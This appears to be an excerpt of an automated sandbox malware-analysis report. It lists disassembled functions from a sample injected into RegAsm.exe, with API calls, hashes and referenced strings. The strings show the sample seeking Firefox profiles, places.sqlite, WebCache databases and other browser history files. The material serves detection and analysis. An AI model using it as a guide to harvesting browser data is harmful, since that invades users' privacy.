                                                                        • API String ID: 3510742995-2641926074
                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                        Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@CreateErrorFileLast
                                                                        • String ID: |A
                                                                        • API String ID: 4200628931-1717621600
                                                                        • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                        • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                        Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                        • memset.MSVCRT ref: 004033B7
                                                                        • memcpy.MSVCRT ref: 004033D0
                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                        • String ID: $0.@
                                                                        • API String ID: 3030842498-1896041820
                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                        Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403C09
                                                                        • memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                        • API String ID: 1534475566-1174173950
                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                        Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 669240632-0
                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                        Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                        • memset.MSVCRT ref: 00414C87
                                                                        • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                        • API String ID: 2925649097-2036018995
                                                                        • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                        • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                        Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00414458
                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                        • String ID: "%s"
                                                                        • API String ID: 1343145685-3297466227
                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                        Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004087D6
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                        • memset.MSVCRT ref: 00408828
                                                                        • memset.MSVCRT ref: 00408840
                                                                        • memset.MSVCRT ref: 00408858
                                                                        • memset.MSVCRT ref: 00408870
                                                                        • memset.MSVCRT ref: 00408888
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 2911713577-0
                                                                        • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                        • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                        • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                        • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                        Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: @ $SQLite format 3
                                                                        • API String ID: 1475443563-3708268960
                                                                        • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                        • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                        • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                        Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmpqsort
                                                                        • String ID: /nosort$/sort
                                                                        • API String ID: 1579243037-1578091866
                                                                        • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                        • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                        • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                        • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                        Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProcessTimes
                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                        • API String ID: 116129598-3385500049
                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                        Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040E60F
                                                                        • memset.MSVCRT ref: 0040E629
                                                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Strings
                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                        • API String ID: 2887208581-2114579845
                                                                        • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                        • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                        Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                        • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                        • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                        • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                        • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                        Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                        • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                        • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                        • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                        Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                        • API String ID: 2221118986-1725073988
                                                                        • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                        • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                        Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: $$8
                                                                        • API String ID: 1475443563-435121686
                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                        Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                          • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                        • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                        • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                          • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                        • String ID:
                                                                        • API String ID: 2722907921-0
                                                                        • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                        • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                        Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                        • memset.MSVCRT ref: 00403A55
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                        • String ID: history.dat$places.sqlite
                                                                        • API String ID: 3093078384-467022611
                                                                        • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                        • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                        Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$File$PointerRead
                                                                        • String ID:
                                                                        • API String ID: 839530781-0
                                                                        • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                        • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                        Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID: *.*$index.dat
                                                                        • API String ID: 1974802433-2863569691
                                                                        • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                        • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                        Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@mallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 3831604043-0
